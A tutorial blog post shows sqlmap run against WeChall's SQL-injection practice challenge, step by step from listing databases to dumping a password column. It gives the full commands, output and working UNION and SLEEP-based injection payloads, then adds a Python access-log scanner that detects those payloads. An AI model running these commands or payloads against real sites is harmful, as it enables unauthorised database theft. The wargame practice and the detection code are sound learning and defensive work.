sqlmap – automatic SQL injection and database takeover tool

I kept seeing a tool called sqlmap mentioned on Twitter and Facebook, so I looked it up and gave it a try.
This is another impressive automation tool. Below is a quick test I ran with it.

sqlmap : http://sqlmap.sourceforge.net/
Manual : http://sqlmap.sourceforge.net/doc/README.html
GUI for sqlmap (Linux) : http://code.google.com/p/gui-for-sqlmap/
GUI for sqlmap (Windows) : http://sourceforge.net/projects/sqlmapwin/

1. Finding the database names (--dbs)

[byjjoon@localhost sqlmap]$ ./sqlmap.py -u "http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login" --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 23:14:18

[23:14:19] [INFO] using '/home/byjjoon/sqlmap/output/www.wechall.net/session' as session file
[23:14:19] [INFO] testing connection to the target url
[23:14:21] [INFO] testing if the url is stable, wait a few seconds
[23:14:24] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[23:14:33] [INFO] testing if GET parameter 'username' is dynamic
[23:14:35] [WARNING] GET parameter 'username' is not dynamic
[23:14:36] [WARNING] heuristic test shows that GET parameter 'username' might not be injectable
[23:14:36] [INFO] testing sql injection on GET parameter 'username'
[23:14:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:14:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:15:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:15:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:15:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:15:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:15:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:15:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:15:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:15:58] [INFO] GET parameter 'username' is 'MySQL > 5.0.11 AND time-based blind' injectable
[23:15:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:16:14] [INFO] target url appears to be UNION injectable with 3 columns
[23:16:22] [INFO] GET parameter 'username' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'username' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: username=-2809' UNION ALL SELECT CONCAT(CHAR(58,118,104,111,58),IFNULL(CAST(CHAR(103,99,77,75,81,100,99,101,89,70) AS CHAR),CHAR(32)),CHAR(58,119,118,101,58)), NULL, NULL# AND 'Pupu'='Pupu&password=test&login=login

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=test' AND SLEEP(5) AND 'zdxt'='zdxt&password=test&login=login
---

[23:16:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[23:16:32] [INFO] fetching database names
[23:16:34] [INFO] the SQL query used returns 2 entries
available databases [2]:
[*] gizmore_tableu61
[*] information_schema

[23:16:37] [INFO] Fetched data logged to text files under '/home/byjjoon/sqlmap/output/www.wechall.net'

[*] shutting down at: 23:16:37

2. Finding the table names (--tables -D)

[byjjoon@localhost sqlmap]$ ./sqlmap.py -u "http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login" --tables -D gizmore_tableu61

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 23:17:25

[23:17:25] [INFO] using '/home/byjjoon/sqlmap/output/www.wechall.net/session' as session file
[23:17:26] [INFO] resuming injection data from session file
[23:17:26] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[23:17:26] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: username=-2809' UNION ALL SELECT CONCAT(CHAR(58,118,104,111,58),IFNULL(CAST(CHAR(103,99,77,75,81,100,99,101,89,70) AS CHAR),CHAR(32)),CHAR(58,119,118,101,58)), NULL, NULL# AND 'Pupu'='Pupu&password=test&login=login

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=test' AND SLEEP(5) AND 'zdxt'='zdxt&password=test&login=login
---

[23:17:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[23:17:28] [INFO] fetching tables for database 'gizmore_tableu61'
[23:17:29] [INFO] the SQL query used returns 2 entries
Database: gizmore_tableu61
[2 tables]
+--------------+
| aaawrong     |
| usertableus4 |
+--------------+

[23:17:33] [INFO] Fetched data logged to text files under '/home/byjjoon/sqlmap/output/www.wechall.net'

[*] shutting down at: 23:17:33

3. Finding the column names (--columns -D -T)

[byjjoon@localhost sqlmap]$ ./sqlmap.py -u "http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login" --columns -D gizmore_tableu61 -T usertableus4

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 23:19:12

[23:19:12] [INFO] using '/home/byjjoon/sqlmap/output/www.wechall.net/session' as session file
[23:19:12] [INFO] resuming injection data from session file
[23:19:12] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[23:19:12] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: username=-2809' UNION ALL SELECT CONCAT(CHAR(58,118,104,111,58),IFNULL(CAST(CHAR(103,99,77,75,81,100,99,101,89,70) AS CHAR),CHAR(32)),CHAR(58,119,118,101,58)), NULL, NULL# AND 'Pupu'='Pupu&password=test&login=login

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=test' AND SLEEP(5) AND 'zdxt'='zdxt&password=test&login=login
---

[23:19:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[23:19:14] [INFO] fetching columns for table 'usertableus4' on database 'gizmore_tableu61'
[23:19:16] [INFO] the SQL query used returns 3 entries
Database: gizmore_tableu61
Table: usertableus4
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| message  | varchar(255) |
| password | varchar(64)  |
| username | varchar(32)  |
+----------+--------------+

[23:19:22] [INFO] Fetched data logged to text files under '/home/byjjoon/sqlmap/output/www.wechall.net'

[*] shutting down at: 23:19:22

4. Dumping the data in a column (--dump -D -T -C)

[byjjoon@localhost sqlmap]$ ./sqlmap.py -u "http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login" --dump -D gizmore_tableu61 -T usertableus4 -C password

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 23:21:37

[23:21:37] [INFO] using '/home/byjjoon/sqlmap/output/www.wechall.net/session' as session file
[23:21:37] [INFO] resuming injection data from session file
[23:21:37] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[23:21:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: username=-2809' UNION ALL SELECT CONCAT(CHAR(58,118,104,111,58),IFNULL(CAST(CHAR(103,99,77,75,81,100,99,101,89,70) AS CHAR),CHAR(32)),CHAR(58,119,118,101,58)), NULL, NULL# AND 'Pupu'='Pupu&password=test&login=login

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=test' AND SLEEP(5) AND 'zdxt'='zdxt&password=test&login=login
---

[23:21:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[23:21:39] [INFO] fetching columns 'password' entries for table 'usertableus4' on database 'gizmore_tableu61'
[23:21:41] [INFO] the SQL query used returns 5 entries
Database: gizmore_tableu61
Table: usertableus4
[5 entries]
+-----------------------------------+
| password                          |
+-----------------------------------+
| test                              |
| tables                            |
| themoreyouknowthemoreyoucanforget |
| tamethepenguin                    |
| thismypass                        |
+-----------------------------------+

[23:21:50] [INFO] Table 'gizmore_tableu61.usertableus4' dumped to CSV file '/home/byjjoon/sqlmap/output/www.wechall.net/dump/gizmore_tableu61/usertableus4.csv'
[23:21:50] [INFO] Fetched data logged to text files under '/home/byjjoon/sqlmap/output/www.wechall.net'

[*] shutting down at: 23:21:50
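Seen from the web server's side, the four runs above leave a recognizable trail in the access log. The following scanner is an added example written for this post, not sqlmap's code and not part of the original walkthrough: it parses constructed Apache access-log lines (the IP address, date and status codes are made up) and flags the two payload shapes sqlmap reported above, the UNION ALL SELECT query whose CHAR() calls build sqlmap's ':vho:' / ':wve:' result markers, and the SLEEP(5) time-based probe.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache access-log lines (not from the original post). The query
# strings reproduce the two payload shapes sqlmap reported above: the UNION
# query with CHAR()-encoded markers and the SLEEP(5) time-based probe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2011:23:14:19 +0900] "GET /challenge/table_names/challenge.php?username=test&password=test&login=login HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2011:23:15:40 +0900] "GET /challenge/table_names/challenge.php?username=test%27%20AND%20SLEEP%285%29%20AND%20%27zdxt%27%3D%27zdxt&password=test&login=login HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2011:23:16:22 +0900] "GET /challenge/table_names/challenge.php?username=-2809%27%20UNION%20ALL%20SELECT%20CONCAT%28CHAR%2858%2C118%2C104%2C111%2C58%29%2CCHAR%2858%2C119%2C118%2C101%2C58%29%29%2C%20NULL%2C%20NULL%23&password=test&login=login HTTP/1.1" 200 734
"""

REQUEST_RE = re.compile(r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
CHAR_RE = re.compile(r"CHAR\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)

def decode_char_calls(sql):
    """Replace MySQL CHAR(n,n,...) calls with the literal text they build."""
    return CHAR_RE.sub(lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")), sql)

def indicators(value):
    """Heuristic SQL-injection indicators for one URL-decoded parameter value."""
    decoded = decode_char_calls(value)
    found = []
    if re.search(r"\bUNION\b.*\bSELECT\b", decoded, re.IGNORECASE):
        found.append("union-select")
    if re.search(r"\bSLEEP\s*\(\s*\d+\s*\)", decoded, re.IGNORECASE):
        found.append("time-based-sleep")
    if CHAR_RE.search(value):
        found.append("char-encoding")
    # sqlmap wraps extracted data in short ':xxx:' markers so it can locate
    # the result in the response; decoding the CHAR() calls exposes them.
    if re.search(r":[a-z]{3}:", decoded):
        found.append("sqlmap-marker")
    return found

def scan(log_text):
    """Return (timestamp, parameter, indicators) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
            found = indicators(value)
            if found:
                hits.append((m.group("ts"), name, found))
    return hits
```

Calling `scan(SAMPLE_LOG)` flags the second and third requests on their `username` parameter and leaves the plain `username=test` login alone; `decode_char_calls` on the CHAR() sequences from the payload above yields the ':vho:' and ':wve:' markers and the random 'gcMKQdceYF' string sqlmap used to confirm the UNION injection.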
